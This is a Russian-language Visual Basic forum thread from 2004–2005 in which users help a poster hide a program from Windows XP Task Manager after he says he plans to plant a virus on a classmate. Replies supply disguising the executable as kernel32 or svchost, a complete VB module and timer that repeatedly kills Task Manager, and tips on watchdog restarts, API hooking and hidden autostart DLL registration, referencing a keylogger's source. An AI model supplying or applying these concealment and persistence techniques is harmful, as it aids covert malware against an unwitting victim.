| Вопрос: Диспетчер задач XP | Добавлено: 12.07.04 08:37 |
Автор вопроса:  Монах
|
| Ответы | Всего ответов: 30 |
|
Номер ответа: 16 Автор ответа: DaSharm ICQ: 780477 Вопросов: 72 Ответов: 1297 |
Web-сайт: Профиль | | #16 | Добавлено: 14.07.04 10:37 |
| Ну а старый трюк с переименовыванием не подходит? | ||
|
Номер ответа: 17 Автор ответа: Монах Вопросов: 26 Ответов: 35 |
Профиль | | #17 | Добавлено: 14.07.04 11:29 |
| Нифига, но можно назвать прогу типа kernel32 или что-то типа этого, ламак испугается его закрывать(ну может только в 98 винде) | ||
|
Номер ответа: 18 Автор ответа: DaSharmICQ: 780477 Вопросов: 72 Ответов: 1297 |
Web-сайт: Профиль | | #18 | Добавлено: 14.07.04 12:27 |
| Есть примерчик, который использует длл | ||
|
Номер ответа: 19 Автор ответа: DaSharmICQ: 780477 Вопросов: 72 Ответов: 1297 |
Web-сайт: Профиль | | #19 | Добавлено: 14.07.04 12:27 |
|
на С++ конечно. |
||
|
Номер ответа: 20 Автор ответа: МонахВопросов: 26 Ответов: 35 |
Профиль | | #20 | Добавлено: 14.07.04 14:41 |
И как я раньше этого не нашёл? Чтобы скрыть приложение пишется: App.TaskVisible = False и всё. А чтобы ламак не обнаружил прогу в списке процессов можно назвать прогу kernel32. Для ламака сойдёт 
|
||
|
Номер ответа: 21 Автор ответа: freeloader  ICQ: 50804884 Вопросов: 72 Ответов: 642 |
Web-сайт: Профиль | | #21 | Добавлено: 14.07.04 16:14 |
| IMHO: для ламака врдяли подойдет, так как будь хоть прога называться svchot.exe он все равно не знает, что такое кернел, тчо такое свисихост, так что будет тыкать все лижбы ... | ||
|
Номер ответа: 22 Автор ответа: freeloader ICQ: 50804884 Вопросов: 72 Ответов: 642 |
Web-сайт: Профиль | | #22 | Добавлено: 14.07.04 16:15 |
|
Надо быть ламаком среднего уровня что бы бояться вырубать кернел32
|
||
|
Номер ответа: 23 Автор ответа:  BarsikРазработчик Offline Client ICQ: 343368641 Вопросов: 17 Ответов: 686 |
Web-сайт: Профиль | | #23 | Добавлено: 14.07.04 17:22 |
а что делать с ламаками низкого уровня??? 
|
||
|
Номер ответа: 24 Автор ответа: sneРазработчик Offline Client ICQ: 233286456 Вопросов: 34 Ответов: 5445 |
Web-сайт: Профиль | | #24 | Добавлено: 14.07.04 18:24 |
|
не для ламаков низкого уровня...
пусть не код, но хотя бы теория... http://wasm.ru/article.php?article=1021007 |
||
|
Номер ответа: 25 Автор ответа:  МонахВопросов: 26 Ответов: 35 |
Профиль | | #25 | Добавлено: 14.07.04 19:45 |
|
Это пацан с класса, которому я собираюсь закинуть вирь, он вообще поооооолный ламак, он даже еле-еле понял как папку копировать... ))
|
||
|
Номер ответа: 26 Автор ответа: sneРазработчик Offline Client ICQ: 233286456 Вопросов: 34 Ответов: 5445 |
Web-сайт: Профиль | | #26 | Добавлено: 14.07.04 21:11 |
|
2Монах, а вот что с зловредным кодом ты собираешься делать, ты уж не распространяйся... это наказуемо...
программить - да, а вот распространять - нет... |
||
|
Номер ответа: 27 Автор ответа: МонахВопросов: 26 Ответов: 35 |
Профиль | | #27 | Добавлено: 14.07.04 22:17 |
| Да мне это и не нужно... Ему закину и всё... | ||
|
Номер ответа: 28 Автор ответа: freeloader ICQ: 50804884 Вопросов: 72 Ответов: 642 |
Web-сайт: Профиль | | #28 | Добавлено: 15.07.04 04:32 |
|
Скажи, что если ты нажмешь три клавиши ALT+CTRL+DEL то сработает, система самоуничтожения и формат ц, это если он знает про три клавиши, а если нет, то ..., сам домысли
|
||
|
Номер ответа: 29 Автор ответа:  Daleko ne hakerICQ: 330-912-919 Вопросов: 4 Ответов: 31 |
Web-сайт: Профиль | | #29 | Добавлено: 02.12.05 00:44 |
|
НЕ ПОЙМУ, мой моя идея - СОЗДАЙ ТАЙМЕР который там не знаю, например каждые 100 мл сек, закрывал Диспетчер задач, помоему при скорости закрытия 10 раз в секунду, он точно его тыкнуть мышкой не успеет, да диспетчер то появиться на экране то толком не успевает ))))) ВОТ ОЧЕНЬ ПРОСТОЙ ПРИМЕР : это копируй в модуль: Public Const PROCESS_TERMINATE = &H1 Public Const WM_QUERYENDSESSION = &H11 Public Const WM_ENDSESSION = &H16 Public Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long, lpdwProcessId As Long) As Long Public Declare Function OpenProcess Lib "Kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long Public Declare Function TerminateProcess Lib "Kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long Public Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long Public Declare Function EnumWindows Lib "user32" (ByVal lpEnumFunc As Long, ByVal lParam As Long) As Long Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long Public Const WM_CLOSE = &H10 Dim strCaptions() As String Dim lngHandle() As Long Public Function CloseProg(strCaption As String) As Boolean Dim iCount As Integer Dim i As Integer Dim Pos As Integer Dim lngEnum As Long ReDim strCaptions(0) ReDim lngHandle(0) lngEnum = EnumWindows(AddressOf Callback1_EnumWindows, 0) For i = 0 To UBound(strCaptions) Pos = InStr(1, strCaptions(i), strCaption, vbTextCompare) If Pos > 0 Then SendMessage lngHandle(i), WM_CLOSE, 0, 0 SendMessage lngHandle(i), WM_ENDSESSION, 0, 0 SendMessage lngHandle(i), WM_QUERYENDSESSION, 0, 0 iCount = iCount + 1 End If Next End Function Public Function Callback1_EnumWindows(ByVal hwnd As Long, ByVal lpData As Long) As Long Dim cnt As Long Dim rttitle As String * 256 cnt = GetWindowText(hwnd, rttitle, 255) If cnt > 0 Then ReDim Preserve lngHandle(UBound(strCaptions) + 1) ReDim Preserve strCaptions(UBound(strCaptions) + 1) strCaptions(UBound(strCaptions)) = Left$(rttitle, cnt) lngHandle(UBound(lngHandle)) = hwnd End If Callback1_EnumWindows = 1 End Function а код таймера: Private Sub Timer1_Timer() On Error Resume Next CloseProg "Диспетчер задач Windows" ' зачем нажно на ошибках не останавливаться, ' я думаю итак понятно !! End Sub И это очень даже действенно, такжн можно прикрывать ему работу тех программ которые могут закрывать процессы |
||
|
Номер ответа: 30 Автор ответа: HACKERРазработчик Offline Client Вопросов: 236 Ответов: 8362 |
Профиль | | #30 | Добавлено: 02.12.05 12:05 |
|
не, это бред... Некоторые пользуются не стандартным диспетчером, пускай я не из таких, но если б у меня он пропадал, я б не поленился найти другой и убить мразную прогу Кроме перехвата NTQuerySystemInformation (VBPhantom) я бы предложил:
1) Поработать над невозможностью убить прогу, т.е. убил, а она откуда-то опять запустилась, типа того... короче сторожа сделать 2) Покопаться в API может получится получить текст с выделенной ячейки в ListView в диспетчере, хендел листа получим через GetCursorPos и WindowFromPoint, потом определим что выделена наша прога, и если это так, то выделим другую прогу на фонарь или просто сбросим фокус с диспетчера, или попробуем переместить нашу прогу по списку выше или ниже, короче чтоб выдиление не попадало на нас... Тогда прогу неполучится выделить чтобы убить... Но опять же, я бы разозлился и запустил бы что-то типа ProcKill
Там DaSharm про DLL чё-то говорил, к нему и вопрос. Зачем именно С++, с таким же успехом я создам DLL на VB? Хотя если имелось ввиду внедрение DLL в другую прогу - тогда согласен. Я к тому что можно на VB создать DLL которая будет чё-то там делать, и прописать её в реестре HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{xxxxxxxxxxxxxxxxxxxxxxxxxxxx}\InProcServer32 И всё с виндой грузится, в диспетчере DLL не видны, возможности те же что и у обычной проги. Так кстати делает делфовский келогер bks32, сырсы в паблике можно найти посмотреть точнее как длл зарегестриировать
|
||